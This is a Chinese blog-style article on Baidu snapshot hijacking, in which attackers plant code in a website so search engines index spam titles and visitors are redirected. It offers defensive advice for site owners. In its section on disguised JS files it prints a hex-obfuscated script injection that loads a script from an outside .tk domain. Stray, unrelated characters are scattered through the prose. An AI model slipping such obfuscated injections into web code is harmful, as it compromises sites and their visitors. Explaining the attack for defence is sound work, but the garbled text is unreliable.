前段時間朋友裝修站經(jīng)常有些莫名其妙的搜索關(guān)鍵詞來到網(wǎng)站坦弟，第一感覺就是被人攻擊了蹋辅，但也看不出有什么異樣照筑，只是在快照上有顯示主域名的標(biāo)題卻是另外的菠菜站胸私。由此初步懷疑是百度快照劫持厌处，首先了解下什么是快照劫持。

? ? ? 百度快照劫持就是黑客通過技術(shù)手段拿到你網(wǎng)站FTP權(quán)限或者數(shù)據(jù)庫權(quán)限植入代碼或添加劫持腳本岁疼，把他想要的內(nèi)容寫進(jìn)一個頁面代碼里阔涉，在首頁Head標(biāo)簽下調(diào)用，當(dāng)搜索引擎訪問你網(wǎng)站的時候抓取到你網(wǎng)站的標(biāo)題-關(guān)鍵詞-描述的時候捷绒，就會抓取到黑客設(shè)定的任何內(nèi)容瑰排！

? ? ? 一般用site命令查看百度快照情況，如

site:...

? ? ? 如果看到和你寫的標(biāo)題暖侨、描述不一樣椭住，就可以判斷是黑客對快照進(jìn)行劫持。了解常見的劫持方法字逗，防患于未然京郑，保障網(wǎng)站安全。

? ? ? 從上面的截圖看來中標(biāo)的不在少數(shù)哇葫掉，點擊“百度快照”查看快照信息些举，標(biāo)題、描述挖息、關(guān)鍵詞都正常金拒，時間也是較新的。嘗試投訴快照套腹，情況依舊绪抛，就給百度反應(yīng)情況，還在等待回復(fù)中电禀。

? ? ? 除了找百度解決問題之前幢码，還需要對自己的網(wǎng)站進(jìn)行查找、修復(fù)等操作尖飞，以免再次受到攻擊症副。

一 放到<head>標(biāo)簽

? ? ? 網(wǎng)站設(shè)計中<head>標(biāo)簽里面有標(biāo)題店雅、描述、關(guān)鍵詞等內(nèi)容贞铣，這部分是明顯寫上去的闹啦，如果是寫到生成后的靜態(tài)首頁html文件里，每次更新首頁都會消失辕坝。但如果不久后又被修改了窍奋，就有可能是通過其他木馬定時修改的，要注意找出來酱畅。

? ? ? 以DedeCMS為例琳袄，有些文件夾是禁止執(zhí)行腳本的，所以能修改你的文件肯定在能執(zhí)行的文件夾內(nèi)纺酸，如果對文件結(jié)構(gòu)不是很熟悉的窖逗，可以和官方的文件夾進(jìn)行對比就能找出問題所在。

二 偽裝JS文件餐蔬、修改PHP文件

? ? ? 這個我們你一定經(jīng)歷過碎紊，比如DedeCMS的版權(quán)信息，如果你用{dede:global.cfg_poweby/}用含，后面都會加上自帶的織夢鏈接矮慕；下載的模板會在友情鏈接里面加入模板開發(fā)者的友情鏈接，這些鏈接是在模板里面看不到的啄骇，每次刷新位置都不一樣痴鳄。

? ? ? 需要注意的是，瀏覽器并不識別JS腳本缸夹，如果用JS的方式插入鏈接痪寻，在查看源代碼里面是完全看不到具體內(nèi)容的。其實這個方法也并不高級虽惭，常見的如：

<script src="../include/js/jq.js" language="javascript" type="text/javascript"></script>

? ? ? 該js文件里面有類似這樣的代碼：

var _$=["\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x77\x7a\x62\x33\x36\x30\x2e\x74\x6b\/\x69\x6d\x61\x67\x65\x2e\x67\x69\x66\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"];

document.writeln(_$[0]);

? ? ? 第一句是通過加密的代碼橡类，第二句輸出內(nèi)容，一般服務(wù)器做特殊處理芽唇，才能輸出正確的內(nèi)容顾画，所以應(yīng)該還有一些PHP文件。

? ? ? PHP有許多包含的寫法匆笤，比如/include文件夾研侣，在核心的PHP文件里面加入劫持代碼，神不知鬼不覺炮捧。

? ? ? 上面的方法都是比較常見的庶诡，一般的CMS有一定的防護(hù)能力，只要自己的數(shù)據(jù)庫咆课、服務(wù)器密碼不泄露末誓，這些都能及時解決扯俱。

三 你已經(jīng)成為黑客的“肉雞”

? ? ? “肉雞”可能很多人不太理解，說白了喇澡，服務(wù)器迅栅、數(shù)據(jù)庫已經(jīng)被黑客拿到了，或者說獲得修改權(quán)限撩幽。

? ? ? 百度有主動提交（投訴）快照的功能库继，黑客可以在晚上無人值守的時候偷偷修改模板文件，生成主頁后向百度提交URL窜醉，然后再回復(fù)成原來的樣子。

快照劫持總結(jié)

? ? ? 黑客通過快照劫持代碼能實現(xiàn)百度快照劫持艺谆，是黑帽SEO比較早的技術(shù)榨惰，通過劫持webshell網(wǎng)站，實現(xiàn)自己的網(wǎng)站排名静汤，主要功能是改變webshell網(wǎng)站的快照琅催，使其快照顯示為你設(shè)置的快照，這個時候?qū)Ψ降木W(wǎng)站快照(包括標(biāo)題虫给，關(guān)鍵字藤抡，描述都變成你的)。

? ? ? 代碼通過實現(xiàn)快照變成你的抹估，當(dāng)然排名也變成你的缠黍，通過內(nèi)置的跳轉(zhuǎn)代碼，每次通過搜索引擎點進(jìn)去药蜻，網(wǎng)站就會跳轉(zhuǎn)到其他網(wǎng)站瓷式。這就是百度快照劫持的原理，以及更高級的301權(quán)重劫持手法语泽！